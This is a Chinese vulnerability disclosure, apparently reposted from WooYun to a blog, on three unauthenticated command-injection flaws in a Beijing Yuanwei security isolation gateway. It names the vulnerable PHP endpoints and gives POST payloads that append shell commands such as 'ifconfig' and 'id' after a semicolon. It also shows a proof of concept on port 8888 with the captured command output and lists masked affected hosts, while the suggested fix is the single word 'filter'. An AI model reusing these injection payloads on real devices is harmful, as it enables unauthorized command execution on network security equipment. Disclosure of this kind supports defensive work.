文章出處

北京遠為安全隔離網關三處命令執行漏洞(無需登錄)

官方網站:http://**.**.**.**/

北京遠為軟件有限公司(以下簡稱:遠為軟件)是一家云計算時代安全的虛擬化產品及解決方案提供商,公司歷經十年技術積淀,于2007年開始市場化進程。遠為軟件的核心團隊來源于國內外虛擬化和信息安全領域的專家,深諳云計算時代虛擬化背景下信息安全的技術發展方向,致力于將遠為軟件打造成為中國虛擬化技術第一品牌,民族基礎軟件的國際品牌。

經測試發現該系統存在任意命令執行漏洞:
 

/highconfig/ha.php post: name=test*;ifconfig>wooyun.txt/highconfig/ha_old.php post: ok=1&float_ip=wooyun;id>wooyun.txt/highconfig/hot.php post: hand=1&localip=wooyun;ifconfig>wooyun.txt



漏洞poc

直接訪問:

**.**.**.**:8888/highconfig/ha.php 并post提交即可:
 

**.**.**.**:8888/highconfig/ha.phpname=test*;ifconfig>wooyun.txt


 

**.**.**.**:8888/highconfig/wooyun.txtem0: flags=8843 metric 0 mtu 1500options=19bether 00:0d:48:cd:56:ddinet **.**.**.** netmask 0xffffff00 broadcast **.**.**.**media: Ethernet autoselect (1000baseT )status: activeem1: flags=8843 metric 0 mtu 1500options=19bether 00:0d:48:cd:56:dcinet **.**.**.** netmask 0x80000000 broadcast **.**.**.**media: Ethernet autoselect (1000baseT )status: activeem2: flags=8802 metric 0 mtu 1500options=19bether 00:0d:48:cd:56:dbmedia: Ethernet autoselectstatus: no carrier,txcsum,vlan_mtu,vlan_hwtagging,vlan_hwcsum,tso4>,simplex,multicast>,txcsum,vlan_mtu,vlan_hwtagging,vlan_hwcsum,tso4>,broadcast,running,simplex,multicast>,txcsum,vlan_mtu,vlan_hwtagging,vlan_hwcsum,tso4>,broadcast,running,simplex,multicast>



其他兩處漏洞類似,均可以直接執行任意命令。

漏洞案例:
 

**.**.**.**:8888/dl.html**.**.**.**:8888/dl.html**.**.**.**:8888/dl.html**.**.**.**:8888/dl.html**.**.**.**:8888/dl.html**.**.**.**:8888/dl.html
**.**.**.**:8888/highconfig/wooyun.txtem0: flags=8843 metric 0 mtu 1500options=19bether 00:0d:48:cd:56:ddinet **.**.**.** netmask 0xffffff00 broadcast **.**.**.**media: Ethernet autoselect (1000baseT )status: activeem1: flags=8843 metric 0 mtu 1500options=19bether 00:0d:48:cd:56:dcinet **.**.**.** netmask 0x80000000 broadcast **.**.**.**media: Ethernet autoselect (1000baseT )status: activeem2: flags=8802 metric 0 mtu 1500options=19bether 00:0d:48:cd:56:dbmedia: Ethernet autoselectstatus: no carrier,txcsum,vlan_mtu,vlan_hwtagging,vlan_hwcsum,tso4>,simplex,multicast>,txcsum,vlan_mtu,vlan_hwtagging,vlan_hwcsum,tso4>,broadcast,running,simplex,multicast>,txcsum,vlan_mtu,vlan_hwtagging,vlan_hwcsum,tso4>,broadcast,running,simplex,multicast>

解決方案:

過濾.

就愛閱讀www.92to.com網友整理上傳,為您提供最全的知識大全,期待您的分享,轉載請注明出處。
歡迎轉載:http://www.kanwencang.com/bangong/20161116/55856.html

文章列表


不含病毒。www.avast.com
arrow
arrow
    全站熱搜
    創作者介紹
    創作者 大師兄 的頭像
    大師兄

    IT工程師數位筆記本

    大師兄 發表在 痞客邦 留言(0) 人氣()

    E-mail轉寄